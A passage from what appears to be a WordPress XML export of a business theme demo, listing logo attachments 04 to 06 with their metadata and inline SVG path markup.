		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/attachment/04/</link>
		<pubDate>Tue, 29 Dec 2020 07:43:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2005</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:43:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:43:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/04.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/attachment/05/</link>
		<pubDate>Tue, 29 Dec 2020 07:43:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2006</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:43:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:43:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/05.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/attachment/06/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2007</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/06.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
